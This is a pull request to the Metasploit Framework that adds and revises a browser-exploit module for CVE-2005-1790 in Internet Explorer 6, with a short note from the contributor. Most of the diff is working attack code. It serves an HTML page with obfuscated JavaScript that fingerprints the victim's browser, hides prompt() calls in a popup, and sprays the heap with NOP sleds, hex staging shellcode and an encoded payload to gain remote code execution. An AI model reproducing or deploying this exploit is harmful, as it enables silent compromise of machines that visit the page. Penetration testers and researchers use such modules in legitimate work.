### PR TITLE
Ms05 054 onload

### DIFF
--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -18,24 +18,30 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'           => 'Internet Explorer Mismatched Document Object Model Objects Memory Corruption',
+			'Name'           => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability',
 			'Description'    => %q{
-				This exploit results in a call to somewhere in the heap. The javascript prompt() call places our
-				shellcode in a location near to what gets called.  To hide the prompt boxes, this exploit creates a popup
-				that is then hidden behind the main window.  In this popup are multiple iframes each calling prompt.
-				Since the heap is read only memory, we have some staging shellcode move the payload into some read/write
-				memory.
+				This bug is triggered when the browser handles a JavaScript 'onLoad' handler in 
+				conjunction with an improperly initialized 'window()' JavaScript function.
+				This exploit results in a call to somewhere in the heap. The javascript prompt() puts our shellcode
+				near where the call jumps to.  We call prompt multiple times in separate iframes to spray the heap.
+				We hide the prompts in a popup window behind the main window. The call then jumps to to our spray value
+				which also acts as a sled down to the actual shellcode. Since the heap is read only, we have some staging shellcode
+				which copies the metasploit payload to some read/write memory and then jumps to it. IE will crash when the exploit
+				finishes.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
 				[
-					'Stuart Pearson',
-					'Sam Sharps'      # Metasploit port
+					'Benjamin Tobias Franz',	# Discovery
+					'Stuart Pearson',	# Proof of Concept
+					'revenge'      # Metasploit port
 				],
 			'References'     =>
 				[
 					['MSB', 'MS05-054'],
 					['CVE', '2005-1790'],
+					['URL', 'http://www.securityfocus.com/bid/13799/info'], 
+					['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
 				],
 			'DefaultOptions' =>
 				{

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Author'         =>
 				[
 					'Stuart Pearson',
-					'revenge'      # Metasploit port
+					'Sam Sharps'      # Metasploit port
 				],
 			'References'     =>
 				[

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -98,10 +98,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		var_title	= rand_text_alpha(rand(100) + 1)
 		func_main	= rand_text_alpha(rand(100) + 1)
 
-		var_spray	= rand_text_alpha(rand(100) + 1)
-		var_i		= rand_text_alpha(rand(100) + 1)
-		var_memory	= rand_text_alpha(rand(100) + 1)
-
 		heapspray = ::Rex::Exploitation::JSObfu.new %Q|
 function heapspray()
 {

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -1,0 +1,193 @@
+##
+# $Id: ms05_054_onload.rb 2011-12-22 revenge $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+	Rank = NormalRanking
+
+	include Msf::Exploit::Remote::HttpServer::HTML
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'           => 'Internet Explorer Mismatched Document Object Model Objects Memory Corruption',
+			'Description'    => %q{
+				This exploit results in a call to somewhere in the heap. The javascript prompt() call places our
+				shellcode in a location near to what gets called.  To hide the prompt boxes, this exploit creates a popup
+				that is then hidden behind the main window.  In this popup are multiple iframes each calling prompt.
+				Since the heap is read only memory, we have some staging shellcode move the payload into some read/write
+				memory.
+			},
+			'License'        => MSF_LICENSE,
+			'Author'         =>
+				[
+					'Stuart Pearson',
+					'revenge'      # Metasploit port
+				],
+			'References'     =>
+				[
+					['MSB', 'MS05-054'],
+					['CVE', '2005-1790'],
+				],
+			'DefaultOptions' =>
+				{
+					'EXITFUNC' => 'process',
+					'InitialAutoRunScript' => 'migrate -f',
+				},
+			'Payload'        =>
+				{
+					'Space'    => 1000,
+					'BadChars' => "\x00",
+					'Compat'   =>
+						{
+							'ConnectionType' => '-find',
+						},
+					'StackAdjustment' => -3500,
+				},
+			'Platform'       => 'win',
+			'Targets'        =>
+				[
+					[ 'Windows XP',
+						{
+							'iframes' => 4
+						}
+					],
+					[ 'Windows 2000',
+						{
+							'iframes' => 8
+						}
+					],
+				],
+			'DisclosureDate' => 'November 21 2005', # wepawet sample
+			'DefaultTarget'  => 0))
+		@var_redir = rand_text_alpha(rand(100)+1)
+	end
+
+	def auto_target(cli, request)
+		mytarget = nil
+
+		agent = request.headers['User-Agent']
+		print_status("Checking user agent: #{agent}")
+
+		if (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.1/)
+			mytarget = targets[0]   # IE6 on XP
+		elsif (agent =~ /MSIE 6\.0/ && agent =~ /Windows NT 5\.0/)
+			mytarget = targets[1]	# IE6 on 2000
+		else
+			print_error("Unknown User-Agent #{agent} from #{cli.peerhost}:#{cli.peerport}")
+		end
+
+		mytarget
+	end
+
+
+	def on_request_uri(cli, request)
+		mytarget	= auto_target(cli, request)
+		var_title	= rand_text_alpha(rand(100) + 1)
+		func_main	= rand_text_alpha(rand(100) + 1)
+
+		heapspray = ::Rex::Exploitation::JSObfu.new %Q|
+function heapspray()
+{
+	var counter=0;
+	var spray = "";
+	var shellcode = "";
+	var prep_shellcode = "";
+	var fillmem = "";
+
+	for (counter=1; counter <= 500; counter++)
+	{
+		spray = spray + unescape("%u7030%u4300");
+	}
+	for (counter=1; counter <= 200; counter++)
+	{
+		fillmem = fillmem + spray;
+	}
+
+	shellcode = unescape("%u5053%u5053");
+	shellcode += unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
+
+	prep_shellcode = unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
+	"%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
+	"%u00ff%ua5F3%u9090%u905f%ue7ff");
+
+	fillmem = fillmem + prep_shellcode + shellcode;
+
+	prompt(fillmem, "");
+}
+|
+		heapspray.obfuscate
+
+		nofunc = ::Rex::Exploitation::JSObfu.new %Q|
+if (document.location.href.indexOf("#{@var_redir}") == -1)
+{
+	var counter = 0;
+
+	top.consoleRef = open('','BlankWindow',
+	'width=100,height=100'
+	+',menubar=0'
+	+',toolbar=1'
+	+',status=0'
+	+',scrollbars=0'
+	+',left=1'
+	+',top=1'
+	+',resizable=1')
+	self.focus()
+
+	for (counter = 0; counter < #{mytarget['iframes']}; counter++)
+	{
+		top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>');
+	}
+	document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");
+}
+else
+{
+	#{heapspray.sym('heapspray')}();
+}
+|
+
+		nofunc.obfuscate
+
+		main = %Q|
+function #{func_main}()
+{
+	document.write("<TITLE>#{var_title}</TITLE>");
+	document.write("<body onload=window();>");
+
+	window.location.reload();
+}
+|
+
+		html = %Q|
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN">
+<html>
+<head>
+<meta http-equiv="Content-Language" content="en-gb">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
+<script>
+#{nofunc}
+#{heapspray}
+#{main}
+</script>
+</head>
+<body>
+</body>
+</html>
+|
+
+		print_status("Sending #{self.name} to client #{cli.peerhost}")
+		# Transmit the compressed response to the client
+		send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })
+
+		# Handle the payload
+		handler(cli)
+	end
+end

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -112,19 +112,13 @@ function heapspray()
 	var memory = new Array();
 	for (i = 0; i < 250; i++){ memory[i] = block + shellcode }
 
-	var counter=0;
-	var spray = "";
-	var shellcode = "";
+	var ret = "";
 	var fillmem = "";
 
-	for (counter=1; counter <= 500; counter++)
-	{
-		spray = spray + unescape("%u0F0F%u0F0F");
-	}
-	for (counter=1; counter <= 200; counter++)
-	{
-		fillmem = fillmem + spray;
-	}
+	for (i = 0; i < 500; i++)
+		ret += unescape("%u0F0F%u0F0F");
+	for (i = 0; i < 200; i++)
+		fillmem += ret;
 
 	prompt(fillmem, "");
 }

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						}
 					],
 				],
-			'DisclosureDate' => 'November 21 2005', # wepawet sample
+			'DisclosureDate' => 'Nov 21 2005',
 			'DefaultTarget'  => 0))
 		@var_redir = rand_text_alpha(rand(100)+1)
 	end

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -20,14 +20,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		super(update_info(info,
 			'Name'           => 'Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution Vulnerability',
 			'Description'    => %q{
-				This bug is triggered when the browser handles a JavaScript 'onLoad' handler in 
+				This bug is triggered when the browser handles a JavaScript 'onLoad' handler in
 				conjunction with an improperly initialized 'window()' JavaScript function.
-				This exploit results in a call to somewhere in the heap. The javascript prompt() puts our shellcode
-				near where the call jumps to.  We call prompt multiple times in separate iframes to spray the heap.
-				We hide the prompts in a popup window behind the main window. The call then jumps to to our spray value
-				which also acts as a sled down to the actual shellcode. Since the heap is read only, we have some staging shellcode
-				which copies the metasploit payload to some read/write memory and then jumps to it. IE will crash when the exploit
-				finishes.
+				This exploit results in a call to an address lower than the heap. The javascript prompt() places our shellcode
+				near where the call operand points to.  We call prompt() multiple times in separate iframes to place our return address.
+				We hide the prompts in a popup window behind the main window. We spray the heap a second time with our shellcode and point the return
+				address to the heap. I use a fairly high address to make this exploit more reliable. IE will crash when the exploit completes.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
@@ -40,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					['MSB', 'MS05-054'],
 					['CVE', '2005-1790'],
-					['URL', 'http://www.securityfocus.com/bid/13799/info'], 
+					['URL', 'http://www.securityfocus.com/bid/13799/info'],
 					['URL', 'http://www.cvedetails.com/cve/CVE-2005-1790'],
 				],
 			'DefaultOptions' =>
@@ -100,32 +98,37 @@ class Metasploit3 < Msf::Exploit::Remote
 		var_title	= rand_text_alpha(rand(100) + 1)
 		func_main	= rand_text_alpha(rand(100) + 1)
 
+		var_spray	= rand_text_alpha(rand(100) + 1)
+		var_i		= rand_text_alpha(rand(100) + 1)
+		var_memory	= rand_text_alpha(rand(100) + 1)
+
 		heapspray = ::Rex::Exploitation::JSObfu.new %Q|
 function heapspray()
 {
+	shellcode = unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
+	var bigblock = unescape("%u9090%u9090");
+	var headersize = 20;
+	var slackspace = headersize + shellcode.length;
+	while (bigblock.length < slackspace) bigblock += bigblock;
+	var fillblock = bigblock.substring(0,slackspace);
+	var block = bigblock.substring(0,bigblock.length - slackspace);
+	while (block.length + slackspace < 0x40000) block = block + block + fillblock;
+	var memory = new Array();
+	for (i = 0; i < 250; i++){ memory[i] = block + shellcode }
+
 	var counter=0;
 	var spray = "";
 	var shellcode = "";
-	var prep_shellcode = "";
 	var fillmem = "";
 
 	for (counter=1; counter <= 500; counter++)
 	{
-		spray = spray + unescape("%u7030%u4300");
+		spray = spray + unescape("%u0F0F%u0F0F");
 	}
 	for (counter=1; counter <= 200; counter++)
 	{
 		fillmem = fillmem + spray;
 	}
-
-	shellcode = unescape("%u5053%u5053");
-	shellcode += unescape('#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');
-
-	prep_shellcode = unescape("%u9090%uBA90%u4142%u4142%uF281%u1111%u1111%u4190" +
-	"%u1139%uFA75%u9090%uF18B%uF88B%u9057%uc933%ub966" +
-	"%u00ff%ua5F3%u9090%u905f%ue7ff");
-
-	fillmem = fillmem + prep_shellcode + shellcode;
 
 	prompt(fillmem, "");
 }
@@ -133,9 +136,11 @@ function heapspray()
 		heapspray.obfuscate
 
 		nofunc = ::Rex::Exploitation::JSObfu.new %Q|
+
 if (document.location.href.indexOf("#{@var_redir}") == -1)
 {
 	var counter = 0;
+
 
 	top.consoleRef = open('','BlankWindow',
 	'width=100,height=100'
@@ -148,11 +153,13 @@ if (document.location.href.indexOf("#{@var_redir}") == -1)
 	+',resizable=1')
 	self.focus()
 
+
 	for (counter = 0; counter < #{mytarget['iframes']}; counter++)
 	{
 		top.consoleRef.document.writeln('<iframe width=1 height=1 src='+document.location.href+'?p=#{@var_redir}</iframe>');
 	}
 	document.writeln("<body onload=\\"setTimeout('#{func_main}()',6000)\\">");
+
 }
 else
 {

--- a/modules/exploits/windows/browser/ms05_054_onload.rb
+++ b/modules/exploits/windows/browser/ms05_054_onload.rb
@@ -34,7 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					'Benjamin Tobias Franz',	# Discovery
 					'Stuart Pearson',	# Proof of Concept
-					'revenge'      # Metasploit port
+					'Sam Sharps'      # Metasploit port
 				],
 			'References'     =>
 				[


### PR DESCRIPTION
Hi,

I ported the Internet Explorer 6 exploit (CVE-2005-1790) from: https://github.com/rapid7/metasploit-framework/wiki/Contributing-to-Metasploit to the framework.  This is my second time submitting this pull request and I think I've fixed all the issues that were pointed out before.  I found a different way to exploit this bug that doesn't involve egg hunting shellcode and I've tested it a bunch more this time on Windows XP SP 2 with IE 6.  Let me know if there's anything else I should change!

Thanks again,
-Sam
